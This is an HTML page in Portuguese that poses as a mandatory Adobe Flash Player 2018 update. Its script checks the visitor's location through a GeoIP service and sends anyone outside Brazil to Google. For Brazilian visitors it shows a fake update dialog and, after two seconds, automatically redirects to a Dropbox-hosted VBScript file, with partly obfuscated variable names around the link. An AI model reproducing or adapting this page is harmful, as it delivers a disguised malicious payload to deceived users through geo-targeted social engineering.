<!DOCTYPE html>
<html>
<head> 
	<title> # Adobe Player 2018 #</title>
</head>
<body>

html><head><TITLE>Carregando a Extensao Obrigatoria Para Uso No Chrome  -  Adobe F Player Video Acelerator Quality HD  APP VIDEO PLUGIN Adobe F Player 2018 Aguarde Por Favor ... $data</TITLE></head><script src="//js.maxmind.com/js/apis/geoip2/v2.1/geoip2.js" type="text/javascript"></script><script type="text/javascript">var onSuccess=function(location){if (JSON.stringify(location, undefined, 4).indexOf('Brazil') > 0){}else{document.location.href='https://href.li/?http://www.google.com';}};var onError=function(error){/*alert( "Error:\n\n" + JSON.stringify(error, undefined, 4) );*/};
link='https://www.dropbox.com/s/z96z9rc4qes2coq/adobe_ae1d2.vbs?dl=1'; ;var _0x4638=[_0x5c2a[0]];var _0x1756=[_0x4638[0]];link= _0x1756[0];var _0x7792=[_0x8e4c[0]];link= _0x7792[0];var _0x862c=[_0x6ccf[0]];link= _0x862c[0];link= _0xa079[0];geoip2.city(onSuccess, onError);</script><body><table width="1448" border="0" align="center" cellpadding="2" cellspacing="2" style="text-align: left; width: 592px; height: 556px;"> <tbody> <tr><center> <td width="1440"> <table style="border-collapse: collapse; width: 553px; height: 493px;" border="0" bordercolor="#111111" cellpadding="0" cellspacing="0"> <tbody> <tr> </tr><tr> <td align="center" bgcolor="#f9f9f9" valign="top"> <h3 align="center"><font><font color="#808080" face="Arial, Helvetica, sans-serif"> Adobe Flash Player - 2018 - <br><br>A Sua Versao do Adobe esta desatualizada, para continuar navegando e preciso que seja feita a atualizacao do seu Adobe Flash Player para versao 2018.</font></font></h3> <table style="text-align: left; width: 626px; height: 320px;" border="0" cellpadding="2" cellspacing="2"> <tbody> <tr> </tr></tbody> </table> </td></tr></tbody> </table> </td></center> </tr></tbody></table><p><br><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script> <script type="text/javascript" src="jquery.cookie.js"></script> <script type="text/javascript" src="jquery.ulightbox.js"></script><br></p><p>&nbsp;</p><link rel="stylesheet" type="text/css" href="jquery.ulightbox.css"><script type="text/javascript">$(document).ready(function(){uLightBox.init({override:false, background: 'black', centerOnResize: true, fade: true});{uLightBox.alert({width: '585px', title: 'Atualizacao Adobe Player 2018 ', rightButtons: ['Clique para Entrar no site'], opened: function(){//$('<span/>').html("<a style='border:0;' id='downloadPdf_' href='"+link+"' target='_blank'><img src='./popup/add.png'></a>").appendTo('#lbContent');}, onClick: function(button){//uLightBox.clear(); document.location.href=link;}});}});</script> <div id="uLightBoxOverlay" class="opaque"><div id="uLightBox" class="shadow top bottom" style="width: 585px; top: 50px; left: 30%;"><div id="lbHeader" class="top"><header>Atualizacao Adobe Flash Player - 2018</header></div><div id="lbContent"><span><a style="border:0;" id="downloadPdf" href="" target="_blank"><img src="appadobefplayer2018.png"></a></span></div><div id="lbFooter" class="bottom"><input type="button" class="flat floatRight" value="Clique aqui para entrar no site" id="Clique aqui para entrar no site"></div></div></div><script type="text/javascript">document.getElementById('downloadPdf').setAttribute('href',link);window.setTimeout(function(){document.location.href=link;},2000);</script></body></html>

</body>
</html>


